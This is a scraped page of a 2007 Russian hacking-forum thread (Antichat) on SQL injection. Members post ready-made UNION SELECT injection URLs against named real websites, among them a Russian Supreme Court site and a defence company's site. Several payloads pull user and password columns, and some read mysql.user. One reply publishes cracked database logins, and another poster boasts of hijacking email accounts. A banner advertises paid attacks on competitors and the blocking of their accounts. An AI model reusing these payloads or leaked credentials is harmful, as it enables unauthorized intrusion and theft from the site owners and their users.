Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 198 из 1242

198

Опции темы

Поиск в этой теме

Опции просмотра

#1971

17.04.2007, 23:27

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

а вот и поинтересней

Код:

http://www.ecotour.ru/viewcountry.php?id=-9+union+select+1,null,concat(user_name,char(58),user_password),4,5+FROM+photo_users/*

вроде админка есть

Код:

http://www.ecotour.by/robots.txt

но хз как в нее попасть также акк подходит к

Код:

http://37.ecotour.by

юзайте

в итоге угнал 3 мыла хоть и не красивые но зато приятно

Последний раз редактировалось }{0TT@БЬ)Ч; 18.04.2007 в 00:19..

#1972

18.04.2007, 06:50

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://www.n.kiev.ua/show_club.php?club=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

Код:

http://www.n.kiev.ua/show_club.php?club=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+news/*

нашел только таблицу news . . .

Цитата:

::: Ночной Киев ::: - афиша, диско, клубы, рестораны, знакомства и многое другое

#1973

18.04.2007, 09:15

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

Провел на форуме:
9254548

Репутация: 1942

Цитата:

http://www.mnogosearch.org/bugs/bugs.php?id=21+order+by+16

9898

#1974

18.04.2007, 10:30

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Отправить сообщение для ice1k с помощью ICQ

Код:

http://scriptmagix.com/index.php?cmd=2&id=-1+union+select+1,concat(username,0x3a,password),3,4,5,6,7+from+admin+limit+1,1/*

#1975

18.04.2007, 10:46

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

Провел на форуме:
9254548

Репутация: 1942

Цитата:

http://www.janetchui.net/picture.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10/*

#1976

18.04.2007, 11:32

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,316

Провел на форуме:
16641028

Репутация: 2371

www.dvdcdtorg.ru

Код:

http://www.dvdcdtorg.ru/?pageId=1&catId=-13+union+select+1,2,concat_ws(char(58,58),version(),database(),user()),4,5,6,7,8/*

www.mfun.ru

Код:

http://www.mfun.ru/music/melody/play.php?melodyid=-1+union+select+1,concat_ws(char(58,58),version(),database(),user()),3,4/*

www.notaryclub.ru
Есть таблица : ccforum_users
Колонки не нашел =)
Версия mysql: 5

Код:

http://notaryclub.ru/users.php?op=show&uid=-5+union+select+1,2,3,4,concat_ws(char(58,58),version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

Верховный суд Российской Федерации

Имеются таблицы:
1)users:
Колонки: нашел только password
2)user:
user : password

Код:

http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58),user,password)+using+cp1251)+from+mysql.user/*

MySQL info

Код:

http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58,58),version(),database(),user())+using+cp1251)+from+users/*

Последний раз редактировалось Isis; 18.04.2007 в 11:34..

#1977

18.04.2007, 11:36

limpompo

Друг Клитора

Регистрация: 27.08.2005

Сообщений: 1,662

Провел на форуме:
6913553

Репутация: 1329

To Isis

Код:

http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58),user,pa  ssword)+using+cp1251)+from+mysql.user/*

расшифровывается так:

root:root
axmet:ax

#1978

18.04.2007, 12:18

V.I.P

Познающий

Регистрация: 06.04.2007

Сообщений: 77

Провел на форуме:
1062869

Репутация: 136

Отправить сообщение для V.I.P с помощью ICQ

http://www.marumi-filter.ru/shop/?id=74'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8, 9,10,1, 2/*

http://www.sexshop-romantic.ro/sex-shop/?id=-26+union+select+1,2,3/* - 3 версия(

http://www.bomdiggy.com/readColumn.php?id=-43+union+select+1,2,version(),4,5,6,7,8+from+users/*

#1979

18.04.2007, 12:23

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

К тем кто выкладывает скули с доступом к базе mysql, выводите не только колонки user и password, а ещё и host

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#1980

18.04.2007, 12:59

_GaLs_

Постоянный

Регистрация: 21.04.2006

Сообщений: 540

Провел на форуме:
1310036

Репутация: 726

Отправить сообщение для _GaLs_ с помощью ICQ

http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12 %20+from+mysql.user/*

http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-9%20union+select+1,version(),3,4,user(),6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23/*

http://www.almaz-antey.ru/news.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

Последний раз редактировалось _GaLs_; 18.04.2007 в 14:15..

Страница 198 из 1242

198

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход